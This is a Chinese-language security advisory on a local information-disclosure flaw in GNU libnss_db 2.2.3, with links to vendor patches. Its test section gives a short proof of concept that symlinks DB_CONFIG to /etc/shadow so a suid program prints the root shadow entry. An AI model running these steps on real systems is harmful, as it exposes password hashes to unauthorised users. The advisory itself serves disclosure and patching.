受影响系统:
GNU libnss_db 2.2.3
描述:
nss_db软件包提供了一套C库扩展,允许将Berkeley DB数据库用作别名、组、主机、网络、协议、用户、RPC、服务和影子口令的主来源。
nss_db库在遇到解析错误时可能会显示DB_CONFIG文件的某些内容,本地用户可以通过将DB_CONFIG符号链接到受限制的文件上然后执行使用该库的suid root应用程序来读取敏感信息。
<*来源:Stephane Chazelas
链接:https://bugs.launchpad.net/ubuntu/+source/libnss-db/+bug/531976
https://www.redhat.com/support/errata/RHSA-2010-0347.html
https://lists.ubuntu.com/archives/ubuntu-security-announce/2010-March/001069.html
*>
测试方法:
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
sudo apt-get install libnss-db
sudo /etc/init.d/nscd stop (in case nscd is installed)
sudo ln -s /etc/shadow DB_CONFIG
$ sudo
line 1: root:*:14553:0:99999:7:::: incorrect name-value pair
[…]
建议:
厂商补丁:
GNU
—
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
https://bugs.launchpad.net/ubuntu/+source/libnss-db/+bug/531976
RedHat
——
RedHat已经为此发布了一个安全公告(RHSA-2010:0347-01)以及相应补丁:
RHSA-2010:0347-01:Moderate: nss_db security update
链接:https://www.redhat.com/support/errata/RHSA-2010-0347.html
Ubuntu
——
Ubuntu已经为此发布了一个安全公告(USN-922-1)以及相应补丁:
USN-922-1:libnss-db vulnerability
链接:https://lists.ubuntu.com/archives/ubuntu-security-announce/2010-March/001069.html
0 条评论。